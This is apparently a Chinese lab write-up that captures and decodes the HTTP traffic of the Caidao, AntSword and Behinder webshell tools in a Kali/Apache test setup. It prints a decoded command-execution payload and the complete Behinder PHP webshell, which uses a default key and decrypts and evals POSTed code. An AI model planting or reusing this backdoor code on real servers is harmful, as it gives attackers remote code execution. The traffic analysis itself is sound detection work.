1.菜刀流量分析
环境:windows10,菜刀,kali,apache2服务
systemctl restart apache2.server //开启Apache2服务
cd /var/www/html
vim shell.php
service --status-all | grep apache2 //查看Apache是否启动
在win10上访问1.php文件
先用菜刀连接上靶场环境,在打开wireshark,过滤掉http包,在菜刀上打开虚拟终端,输入一下命令。
回到wireshark上追踪靶场机的http流
用bash64进行解码
解码前:QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JG09Z2V0X21hZ2ljX3F1b3Rlc19ncGMoKTskcD0nL2Jpbi9zaCc7JHM9J2NkIC92YXIvd3d3L2h0bWwvO25ldHN0YXQgLWFuIHwgZ3JlcCBFU1RBQkxJU0hFRDtlY2hvIFtTXTtwd2Q7ZWNobyBbRV0nOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjskYXJyYXk9YXJyYXkoYXJyYXkoInBpcGUiLCJyIiksYXJyYXkoInBpcGUiLCJ3IiksYXJyYXkoInBpcGUiLCJ3IikpOyRmcD1wcm9jX29wZW4oJHIuIiAyPiYxIiwkYXJyYXksJHBpcGVzKTskcmV0PXN0cmVhbV9nZXRfY29udGVudHMoJHBpcGVzWzFdKTtwcm9jX2Nsb3NlKCRmcCk7cHJpbnQgJHJldDs7ZWNobygiWEBZIik7ZGllKCk7
解码后:
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/;netstat -an | grep ESTABLISHED;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
注:因为PHP7版本过高,在PHP7中,动态调用一些函数是被禁止的,比如在array_map中调用报错,要找到菜刀的配置文件进行修改
2.蚁剑流量分析
还是和菜刀一样的靶场环境
访问http://192.168.188.177/shell.php,发现没有报错,打开蚁剑连接
还是一样使用wireshark进行抓取http包,进入到虚拟终端中任意使用一条命令,在对抓取到的http数据包进行分析。
蚁剑使用URL解码,也可设置其他的编码器
3.冰蝎流量分析
冰蝎利用了服务器端的脚本语言加密功能,通讯的过程中,消息体内容采用 AES 加密,基于特征值检测的安全产品无法查出,要连接的条件是上次冰蝎自带的webshell(冰蝎的server目录里能找到)
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
靶场环境和上面的是一致的,在网站根目录下创建了一个shell1.php文件,我们在浏览器上打开次路径
打开wireshark进行抓包,用冰蝎进行连接,并在虚拟终端输入几天命名产生http交互。
解码发现有assert | 后面有base64_decode,意思是隔断|后面的内容将这后面的代码进行一次base64解码
解码后
@error_reporting(0);
function main($content)
{
$result = array();
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode($content);
$key = $_SESSION['k'];
echo encrypt(json_encode($result),$key);
}
function encrypt($data,$key)
{
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}
}$content="eURHZnpzQ3d1WHpXOVZLWDVCeWpkZHBBSzd1S0JiTEhwNXZoNDVIR0NKTHROWVZ3M1lGQTFKam03SGhhQ0NkUkZuUlhJbFNOVENkMGtwUUplVXF3WUVzaE1ROEpMeFlNQTQxN2JBVms2WUlWdUh0d0pOVXY0NTBzWWcwaUo3RjNoYXhuZ29pYlNYelRxR3lWVE9mQU9JYTRCaHBwVVZ0b2lDSlNISkFEV3g5QWpES3J2dGRqUzJaejhRM3hQM0tGbXJ6eWVOdUJ0ZU5TdnJSMFlDOXVFR09JeFJXOUtKRVJ2ZEl4aEQzVGNsMndmdFNVWGJENWNWM3NCUDVaSWhRUXVVTE96VDVBSWFmV3h3UlRqU2VqTTZRQngxUkpGQ3pxR0dVZkxTNmptZHZHMU9WSThwMGFrYk5tZ01Zc1NkUlpVdGpNRlRhMXlEWWZad0xFTG9sSThsTEd6dFFwSVV4bzJPc1REWW5lclJyNTNETGlLbXNNQXhCc1JxVzV2RjJ3eXpVdElNdjM3OW1lZHU0RWs3MmE0ZTBDRklnWFBhSWlIcTJPRlNOempvZmVIb3lqclZKcTQ3eFNHTFU0UWdMU0lOc1NRamo2alk3dUwxVVMySEpZaVVlb0ZOSTFnV2FIeGpSWTJBa0l1TFJVTlVjQnh1aDdSY1J0M3E2S1VTR0dJRTl5NkM5dW5jbGExQ1VqbDJiNFhlR05acE9UbFlkWE1WeWd3bThvUkRmNXZhZWw0NjczOVp5eXFrWFA1ZDhmTUJqeFB5Mkk2bjRCNTUxVnI4ZWtkNDB6RDE1bXF0UG5mUG1aVk5IMlV0QzZmdk91SmJwblVGZDV5SWVab1RDcnJrNnlpT1JLNjBMNzRsSXh0OUkyU1ZickV2Z1U0U3BzTE1ORFhvdWkzVnVpMjM0cW83RnZGSFlHTDNjeFFLVW5ScVJ3eVo0UTJHcTdjQm9rMVlCSGI0TUtzUUhYdHFMQkFNcDk0bURJb2dEdlVqSFFOa1pqQW45TFpDdnlQNzBZRzJjN0RSQThMYkpvUHZkOVl6RDNjQmxXM2hkS2x1cjNxR0UwVHk4UGxycDhQYUgxdWtSUEhIeERwN1YzZkl5ZFZaNU9NOVU2WjBsTjJDU3RzMVA5OVhiS0lvMTNEUzhLc0JpVXdKU3I3WGhzQ1l3OFN5RWF5c3NwSnFrSGh4dFZlNGRZOW13Rk8yRjVXdFFvZXp6NjR4cGJ0SVd3WGxzV0NhVnduYm1ZSWh6VWwyaTBGRzB2Vm9JcEhXa21YM1VRbERJbUpRRjcwd09VOGlQU2oxTEFOR1U0R0NRUFR1MUFtb0NBZmR1dFdyRlZDOXdWSDAweFkyNEdQVEdmRlA5SFFpVUxraTZCWGZGYzV1c21xbWkwN1Y4T1Y0enlQVHhtdGoxZ2l1cnIwVjVUQkVFV0JwRWJ3ZUlWYlg4ajEwaVQ5OHoxMGZoUXczbktpNWlBdHhFRGNnemhSOUgwUXB2STF3RXlVMGE5THdoalp5dWE5WTJpdm9mcEdhS3RPeEFZRlBsNUg4V090cjRhcERLdnVHM2dpNFBVTXJXbFFPTGRSZW9jOElIYWJZZWk4UmJ3REcyVVZKQXdBOFZJeWZ4VHBrZnliYXc2TUdCTnYyUkpqcXhJQ1NPbzRTdTFoQ0Y4aWxiUVBuNjZNbUNnS2dYR3JzVXZOV3daM2lvVVhtVDNzQkZnWFk5N3pRWmJQNE5Xc3dwM0NFaTlXRVNwemJkbERVNTRQaXBHRVlZMHhjVzM3bkpJeFE5ZmVLSzhHYjNMa0t2bVA0UlRXc0FBQUxSTFpEWE1nN3NtSXpVSmdaRnJFTUdneFYyUkVtcUxwTDZzbzNmYnJDTlJwV01qRDlKZVNhdGxwT1pQdTFSTmtjQVBWQ3ZhVUkwZTBEV2Q1czYzSkVqZHkzOHl6THFJdmpGREd6NEl6MjZ0bVpKUDhXTGFRZVJ5M3BKU3Q2cXAyRWlYS05yajRha21nRGRzQXVHcXU1OGhJSHJhMENBUVY2SGZIa094TVZpTWRWUkR4NWprRzdvV1l0YlpYcTFYNU5HU2FwTk1IWVp0SWtMN0pQRm1GM1RCcGNuTjBtb0ZvNFRUcWtPWVVnWTNpd3R5OHpiUnhJZk53QW5IcHgwQVBhVE9hUFVjeE1ybmtFb09SZzRpaHJvT1ZoZ2t0R25HaTV0S2RHV3F4MEVvazFRTjlUdTFmNUNhVDFQWWxjNFVaOHVJbW1vdFVWWTViY0tlVWhqek1nVEdpS1Nha0MzQzR1TjVpaENuR3VlUlJuSEdiZndmYU5pYVliMHB6R2EyNE02cHNNbEV0Q1lvMDVYQzBSaWRXeVJnajBlTmZmNGx6dEllaFNiSU5ZV3MzeU9JRllOZXlac0R0S3FGNUZCMUlnM2U2UU8xRVZqdTRVcWpWSEF6cTA0ZEdvQk92RWlJU2dxR2tmc3ljdWdodmpLVU9uekJSaTFhZWhKWVkwd2tYaGVRUGZsOE5sZ1lkMXZQanBXRTNyUG56OE1pNElBT24yQkkwTkZUQlZEb0IxYmNFemx2RzVPYVZsMjdNNnpQYVltN3JEZXYycjlWNjFhTEZjOGhkWXNwaVZGa2NOb3E0eHpNWjVtUU1keW9KTDRnbVBSR3I4bnNRbEZ4VmNSRnZTcEV5OHJjYk1Xd1RENHFaSFNQaVc2M3RTWnpKV1NPVko3RHQwUjBOOU5EaFBqRFVUNXhZa0pQNzk0SkJrM1B5Y2E4aktpMFVibUU1Q3pvbjZZMnlBUXQ1Y3F0ajJrdlF1WG1qMU41alZsd2hnS1hQV0dWQ09FMVh3VlN5VEx6Z213ZnRwV3Q4NFBUbzNGbTRvNzNxeUZ4WUxPdWhKd0tCVzlZM3lUR1duVjRTVFpraGpBdW5jWlJwZHlPem9xcDFVOEFLWHZES2V0QWpZOHJBOGlaRk1uUktrQ3Y3UEZLN1k4UW5JYkFnZTlIdWc4bHZTWlpuOWVNMlNFV1FpWjM5Z3BhY0I5dnVLOHd6UzNvYjdaZFhSWVZFQ1VDZE1oQVlDcVJMb2RXUUgzb0xnMFpp";$content=base64_decode($content);
main($content);